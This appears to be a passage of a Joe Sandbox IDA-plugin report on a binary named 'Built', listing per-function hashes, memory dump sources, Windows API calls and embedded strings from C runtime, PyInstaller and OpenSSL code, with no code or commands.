                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: _set_statfp
                                                              • String ID:
                                                              • API String ID: 1156100317-0
                                                              • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                              • Instruction ID: 839da728aebb9bb77556e17cd32a6103cff6846385891e8410bf06912e5219f9
                                                              • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                              • Instruction Fuzzy Hash: 88118F72E5CA1301FF5C1525FC5637620447F59374E040734EE7EC62DA8EAEA941AB07
                                                              APIs
                                                              • FlsGetValue.KERNEL32(?,?,?,00007FF62665A613,?,?,00000000,00007FF62665A8AE,?,?,?,?,?,00007FF62665A83A), ref: 00007FF62665B41F
                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF62665A613,?,?,00000000,00007FF62665A8AE,?,?,?,?,?,00007FF62665A83A), ref: 00007FF62665B43E
                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF62665A613,?,?,00000000,00007FF62665A8AE,?,?,?,?,?,00007FF62665A83A), ref: 00007FF62665B466
                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF62665A613,?,?,00000000,00007FF62665A8AE,?,?,?,?,?,00007FF62665A83A), ref: 00007FF62665B477
                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF62665A613,?,?,00000000,00007FF62665A8AE,?,?,?,?,?,00007FF62665A83A), ref: 00007FF62665B488
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: Value
                                                              • String ID:
                                                              • API String ID: 3702945584-0
                                                              • Opcode ID: 43a5c13e669b9c0dc60c9d5204f3187f9cebb30c335aac4df6ce1d0b58ad24f5
                                                              • Instruction ID: 4f693b279e088b5053dbb626147a3c339ff2ec3b725095acc2c66729fd840cac
                                                              • Opcode Fuzzy Hash: 43a5c13e669b9c0dc60c9d5204f3187f9cebb30c335aac4df6ce1d0b58ad24f5
                                                              • Instruction Fuzzy Hash: 50117F60A0C60345FE68A7219E631796142BF847B0F588335E93DCA6DBDE2EE441AF03
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: Value
                                                              • String ID:
                                                              • API String ID: 3702945584-0
                                                              • Opcode ID: 8aa69c65082f5ed190463b1c2d732539134b8ecb86da000f77e4666776fecf75
                                                              • Instruction ID: c9919ac2db97eb4bc1be2fd7a4628661d93e76f95d8e961aa834a1a8815db9f3
                                                              • Opcode Fuzzy Hash: 8aa69c65082f5ed190463b1c2d732539134b8ecb86da000f77e4666776fecf75
                                                              • Instruction Fuzzy Hash: 4B110360A0820786FE69A3614C6327A1142BF45370F584734D93EDA2C3DE2FB805AF93
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID: verbose
                                                              • API String ID: 3215553584-579935070
                                                              • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                              • Instruction ID: dcc7626ceb969f4791abe236f85fde07e64d22b0293a6971aba1858fd95382af
                                                              • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                              • Instruction Fuzzy Hash: 9891AF32A08A4641FF618E29DC5237D3291BB44B94F644136DA4AC33E7DE3EE445EB43
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                              • API String ID: 3215553584-1196891531
                                                              • Opcode ID: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
                                                              • Instruction ID: 18a349483acf42ec169e6105a05702d57b502b0b67f55302b880493ff16e8da4
                                                              • Opcode Fuzzy Hash: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
                                                              • Instruction Fuzzy Hash: 6C81AF32E082829DFFA45E25891227936A0FB11B48F558135DA09D769BDF3FE901BF03
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090834885.00007FFDF0FA1000.00000040.00000001.01000000.00000017.sdmp, Offset: 00007FFDF0FA0000, based on PE: true
                                                              • Associated: 00000005.00000002.2090802749.00007FFDF0FA0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090834885.00007FFDF1004000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090834885.00007FFDF1050000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090834885.00007FFDF1053000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090834885.00007FFDF10AC000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090834885.00007FFDF10B1000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090834885.00007FFDF10B4000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091138354.00007FFDF10B5000.00000080.00000001.01000000.00000017.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091174931.00007FFDF10B7000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffdf0fa0000_Built.jbxd
                                                              Similarity
                                                              • API ID: 00007B6570
                                                              • String ID: CJK UNIFIED IDEOGRAPH-$HANGUL SYLLABLE
                                                              • API String ID: 4069847057-87138338
                                                              • Opcode ID: e657152ac4094f32ba0708cb657417d7ffcc531fc35973db48cf3960ceff084e
                                                              • Instruction ID: 07ecb0f9d185ca82fa2679671e48dd62f0fa859c6d8d547e4e0b80843592b55f
                                                              • Opcode Fuzzy Hash: e657152ac4094f32ba0708cb657417d7ffcc531fc35973db48cf3960ceff084e
                                                              • Instruction Fuzzy Hash: 79810832B1C68246E7A48B19A868ABA6751FFC4768F440335EA7E8B7CDDF3CD5059700
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                              • String ID: csm
                                                              • API String ID: 2395640692-1018135373
                                                              • Opcode ID: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
                                                              • Instruction ID: 0f901787a06be744a7c178693a72e106887a6fa72cc5c19755e2968ed663cd31
                                                              • Opcode Fuzzy Hash: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
                                                              • Instruction Fuzzy Hash: 8F51AF32F196029AEF24CB15E864A796791FB44B98F104131DA4E877C8DFBEE841DB02
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: CallEncodePointerTranslator
                                                              • String ID: MOC$RCC
                                                              • API String ID: 3544855599-2084237596
                                                              • Opcode ID: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
                                                              • Instruction ID: 3ea4b310dadff013d513bc01293433b36559e9295327901e133b30c67d27607d
                                                              • Opcode Fuzzy Hash: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
                                                              • Instruction Fuzzy Hash: 6661BE72908BC585EB309B15E8503AAB7A0FBC5B88F044235EB9C43B95CFBDD190CB42
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                              • String ID: csm$csm
                                                              • API String ID: 3896166516-3733052814
                                                              • Opcode ID: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
                                                              • Instruction ID: 48e96f77dab55167929b669b7d6553ea229c55d619ebfb299d2cc947fa23bb9d
                                                              • Opcode Fuzzy Hash: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
                                                              • Instruction Fuzzy Hash: 865181329082828EEF748E21996436836A0FB95B94F149135DA5C87795CFBEE850DF43
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2091238325.00007FFDF10C1000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFDF10C0000, based on PE: true
                                                              • Associated: 00000005.00000002.2091206646.00007FFDF10C0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF10CD000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1125000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1139000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1149000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF115D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF130C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF130E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1339000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF136A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1390000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13DE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13E4000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13E6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1402000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF140F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2092865869.00007FFDF1413000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2092944994.00007FFDF1414000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffdf10c0000_Built.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ..\s\crypto\async\async.c$T
                                                              • API String ID: 0-2182492907
                                                              • Opcode ID: 84e0df82d853d50b4fd7d046fc8fec4d13de8957f562a682e85f1a9d1bb3de25
                                                              • Instruction ID: 45e3f8202411b6b70623e9062ca7a4586f97b9062f191e5a5a2c44eaa0cfe527
                                                              • Opcode Fuzzy Hash: 84e0df82d853d50b4fd7d046fc8fec4d13de8957f562a682e85f1a9d1bb3de25
                                                              • Instruction Fuzzy Hash: 03517C32B1964282EB20EB12D420DA977A9FF84B94F488435DA6D47BDDDF3DE509DB00
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2091238325.00007FFDF115D000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFDF10C0000, based on PE: true
                                                              • Associated: 00000005.00000002.2091206646.00007FFDF10C0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF10C1000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF10CD000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1125000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1139000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1149000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF130C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF130E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1339000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF136A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1390000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13DE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13E4000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13E6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1402000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF140F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2092865869.00007FFDF1413000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2092944994.00007FFDF1414000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffdf10c0000_Built.jbxd
                                                              Similarity
                                                              • API ID: getnameinfohtons
                                                              • String ID: $..\s\crypto\bio\b_addr.c
                                                              • API String ID: 1503050688-1606403076
                                                              • Opcode ID: b69e7613c5b0375f733938ffa7987aef18c604bb2f14d9f82ce55754868d6c3f
                                                              • Instruction ID: 6bafec0d53c0362c1d3595a048d8b356c4c4a5fd95c9e867dd1ac116cb273fc5
                                                              • Opcode Fuzzy Hash: b69e7613c5b0375f733938ffa7987aef18c604bb2f14d9f82ce55754868d6c3f
                                                              • Instruction Fuzzy Hash: FF51B162F1865386FB209B11D470ABA73A8EB41748F44C135EAAD476DDEF3DE845CB00
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2091238325.00007FFDF10C1000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFDF10C0000, based on PE: true
                                                              • Associated: 00000005.00000002.2091206646.00007FFDF10C0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF10CD000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1125000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1139000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1149000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF115D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF130C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF130E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1339000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF136A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1390000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13DE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13E4000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13E6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1402000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF140F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2092865869.00007FFDF1413000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2092944994.00007FFDF1414000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffdf10c0000_Built.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ..\s\crypto\bio\b_sock.c$J$host=
                                                              • API String ID: 0-1729655730
                                                              • Opcode ID: 31c7aae0c6204fcaae541c015ea13e20bcfa82d779c5bb0f8b846d03ff15bf19
                                                              • Instruction ID: b35d75761ff05747ab1e79697511e621a8e8f1dbd3d1af461e87b6f0afd4ea37
                                                              • Opcode Fuzzy Hash: 31c7aae0c6204fcaae541c015ea13e20bcfa82d779c5bb0f8b846d03ff15bf19
                                                              • Instruction Fuzzy Hash: 6E318E36B0858282EB10DB55F4619AEA364FB85794F444135EBAC47BDEDF3DD5408F00
                                                              APIs
                                                              • CreateDirectoryW.KERNEL32(00000000,?,00007FF62664352C,?,00000000,00007FF626643F23), ref: 00007FF626647F22
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: CreateDirectory
                                                              • String ID: %.*s$%s%c$\
                                                              • API String ID: 4241100979-1685191245
                                                              • Opcode ID: 517c45005fecb665460f06d6deeb7a52b86fc8f3bacaeb8cdec2a0b3fdaf0698
                                                              • Instruction ID: 540cced50a328dd1f20bb940f2d3fe54eabee7226bfb0d1752e4e80dd14acea4
                                                              • Opcode Fuzzy Hash: 517c45005fecb665460f06d6deeb7a52b86fc8f3bacaeb8cdec2a0b3fdaf0698
                                                              • Instruction Fuzzy Hash: 0E31D421719AC245EE718B21EC603EA6364FF94BE4F040231EA6D87BC9DF6DD6059F02
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: Message
                                                              • String ID: ERROR$Error$[PYI-%d:%ls]
                                                              • API String ID: 2030045667-255084403
                                                              • Opcode ID: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
                                                              • Instruction ID: bdd7f91bfeed5a8977b4cfee13161e5ebdae5eaf08ae7c9fc98273865e83f8d3
                                                              • Opcode Fuzzy Hash: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
                                                              • Instruction Fuzzy Hash: 1A21D372708B4292EB20DB14F8447EA7364FB88780F400132EA8D97756DF3DD259DB42
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2091238325.00007FFDF10C1000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFDF10C0000, based on PE: true
                                                              • Associated: 00000005.00000002.2091206646.00007FFDF10C0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF10CD000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1125000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1139000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1149000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF115D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF130C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF130E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1339000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF136A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1390000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13DE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13E4000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13E6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1402000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF140F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2092865869.00007FFDF1413000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2092944994.00007FFDF1414000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffdf10c0000_Built.jbxd
                                                              Similarity
                                                              • API ID: 00007B5630
                                                              • String ID: ..\s\crypto\pem\pem_pkey.c$DH PARAMETERS$X9.42 DH PARAMETERS
                                                              • API String ID: 2248877218-3633731555
                                                              • Opcode ID: 3ba81f49d5ceb9f4a6875a9e5438a20396f096326d0a69e27fc56574318964df
                                                              • Instruction ID: 63c937320265c4fb2cb6959b281418910ebd7713f8549d46a6e6895c93ea6c47
